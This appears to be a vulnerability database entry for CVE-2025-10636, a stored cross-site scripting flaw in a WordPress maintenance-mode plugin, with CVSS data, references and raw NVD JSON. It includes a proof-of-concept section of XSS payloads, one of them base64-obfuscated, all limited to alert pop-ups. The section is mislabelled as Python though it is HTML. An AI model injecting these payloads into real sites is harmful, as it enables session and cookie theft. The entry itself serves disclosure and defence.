CVE-2025-10636

Description

The NS Maintenance Mode for WP WordPress plugin through 1.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

NS Maintenance Mode for WP WordPress plugin <= 1.3.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Stored XSS PoC for CVE-2025-10636 -->
<!-- This PoC demonstrates the vulnerability in NS Maintenance Mode plugin -->

<!-- Step 1: As admin, go to plugin settings page -->
<!-- Step 2: Inject XSS payload in settings fields -->

<!-- Example payloads for different settings fields: -->
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert(document.domain)>

<!-- Example: Inject in maintenance mode title/description field -->
<!-- Replace normal text with: -->
<svg/onload=eval(atob('YWxlcnQoJ1hTUyBNT0RFIERldGVjdGVkIScpOw=='))>

<!-- After saving, when admin revisits settings page, JS executes -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10636
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10636
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10636/
[4] VulDB https://vuldb.com/cve/CVE-2025-10636
[5] https://wpscan.com/vulnerability/a1ab1d82-108e-4f66-9d06-5036cde9678a/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10636", "sourceIdentifier": "[email protected]", "published": "2025-10-30T06:15:43.577", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The NS Maintenance Mode for WP WordPress plugin through 1.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 2.5}]}, "references": [{"url": "https://wpscan.com/vulnerability/a1ab1d82-108e-4f66-9d06-5036cde9678a/", "source": "[email protected]"}]}}